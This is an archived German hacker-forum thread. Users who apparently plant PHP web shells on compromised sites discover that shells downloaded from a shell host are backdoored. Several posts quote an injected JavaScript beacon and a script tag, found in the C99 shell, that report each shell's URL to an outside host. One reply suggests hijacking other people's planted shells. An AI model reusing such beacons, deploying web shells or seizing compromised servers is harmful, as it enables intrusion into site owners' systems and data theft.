PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : r57.gen.tr - Backdoored?

Kataklysmos
11.01.12, 20:09
Hallo,

viele von euch kennen sicher den Shellhoster "r57.gen.tr", bei dem es die meisten PHP- Shells zum download gibt. Auch ich habe mich bei dessen Angebot bedient und glaube, es bereuen zu müssen.

Vor kurzem, sehr kurzem, sah ich genau meine URL zu der Shell, welche wirklich meine URL war und ganz sicher in keinen Google- Index kommt, und fragte mich, woher zum Teufel die Person die URL hat. Aus reiner Verzweiflung habe ich die URL einfach mal bei Google eingegeben und sah einen Fund: [Link nur für registrierte und freigeschaltete Mitglieder sichtbar]

Ich schaute mir die Datei an und es sind etliche URLs von PHP- Shells. Daraufhin googlete ich das Verzeichnis ( [Link nur für registrierte und freigeschaltete Mitglieder sichtbar] ). Die Ergebnisse waren etliche JS- Codes, welche scheinbar in den Shells von der Seite inkludiert wurden:
a=new/**/Image();a.src='[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]'+escape(location.href);

Ich testete selber diesen PHP- Script mit einem dummen GET- Parameter und sah dieses nun gleich unten auf der oben erwähnten Liste stehen.


Somit vermute ich, dass r57.gen.ts ihre Dateien backdoored.
Was meint ihr dazu?


Kataklysmos
gehaxelt
11.01.12, 20:15
Gute Idee von denen.

Schlecht für die Nutzer.

Vorschlag:
Die Shells "übernehmen". Sprich eigene Shell hochladen und die alte löschen.
Diese Shells dann irgendwie zum Vorteil von Secunet einsetzen :)

Gruß
Cyber Tjak
11.01.12, 20:17
[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]
[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]
[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]

sind weitere "verdaechtige" Links.
sup3ria
11.01.12, 20:19
Sieht nach einem Cookie Stealer aus.
Kataklysmos
11.01.12, 20:27
Sieht nach einem Cookie Stealer aus.

Entschuldigung, aber nein!
Schau dir den JS- Code zwei Sekunden an und du wirst sehen, dass die aktuelle URL übergeben wird. Was bringen dir denn Cookies bei einer Shell?


Kataklysmos
ben
11.01.12, 20:48
Das war meine Quelle :( hab sie seit 3 wochen gefunden. ^^
Dsystem
11.01.12, 21:07
Was soll man sagen, sieht nicht nur so aus sondern die shells sind backdored.
krYon
12.01.12, 01:46
irgendwer sollte die Shells mal untersuchen...
AirSys
12.01.12, 01:53
Danke das du uns darauf aufmerksam machst! Falls es stimmen sollte, dass die shelled Seiten gestohlen werden ist das echt eine fette Schweinerei!

~AirSys
Cyber Tjak
12.01.12, 16:58
Die C99-Shell ist backdoored:
<SCRIPT SRC=[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]></SCRIPT>
(Zeile 2920)

Wenn man sich die JS-Datei man anschaut sieht man sofort, dass es ein Backdoor ist (nicht mal obfuscated oder souwh.. :O)
ezah
12.01.12, 17:22
da ist alles bdoorend is auch türkische seite
die meisten shells aus der türkei sind bdoored


soll jezt nix schlimmes gegen türken sein ist aber so laut meiner erfahrung
Bewiz
12.01.12, 17:25
Bin selber Türke und auch etwas in der türkischen Szene , und man kann echt sagen 99% sind backdoored :)